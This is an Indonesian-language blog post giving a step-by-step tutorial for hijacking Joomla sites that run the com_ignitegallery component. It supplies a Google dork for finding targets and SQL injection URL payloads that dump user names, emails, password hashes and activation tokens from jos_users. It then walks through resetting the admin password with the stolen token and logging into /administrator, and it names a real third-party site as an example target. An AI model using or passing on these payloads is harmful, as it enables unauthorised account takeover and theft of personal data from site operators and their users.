Ok , kali ini saya mau share Exploit Joomla
Cekidoooot langsung ajahlah G Perlu Basa-basi nanti keburu Basi..hahahaha
saya akan ambil contoh yang inurl:"option=com_ignitegallery"
[2] Exploit :
index.php?option=com_ignitegallery&task=view&gallery=
-4+union+all+select+1,2,group_concat
(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,
usertype),4,5,6,7,8,9,10+from+jos_users--
[3] Reset Password : /index.php?option=com_user&view=reset
[4] Exploit Token :
/index.php?option=com_ignitegallery&task=view&gallery=
-4+union+all+select+1,2,group_concat
(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,
0x3a,activation),4,5,6,7,8,9,10+from+jos_users--
[5] login admin : /administrator
[5] login admin : /administrator
======
=step1=
======
coba
kita cari di google dengan dork ini :
inurl:"index.php
option=com_ignitegallery"
======
=step2=
======
pasang
exploitnya
exploit :
index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+
1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,
password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--
contoh :
contoh :
Nah Munculkan User |
Password | Email
=step3=
======
coba
kita reset password nya.
password dengan menggunakan exploit ini :
/index.php?option=com_user&view=reset
Contoh :
http://www.kaikourafishing.co.nz/index.php?option=com_user&view=reset
kemudiaaan enter deh
hmmmm....
minta email dia.. masukin aja email admin tadi yang kita dapat.=step4=
======
hmm...wah !!!
minta activation pula? tenang kita cari dulu token activationnya
exploit nya gunakan exploit token yg di atas..
=step5=
======
copas aja ke yang tadi lalu enter
======
=step6=
======
sekarang, meminta password baru ? isilah sesuai yg agan inginkan
======
=step7=
======
oke..!!
langsung ke tahap berikutnya, sekarang kita masuk ke adminnya
::-Selamat Mencoba-::
*BERANI UNTUK MENGHADAPI
KEGAGALAN
UNTUK DAPAT
MERAIH
KEBERHASILAN*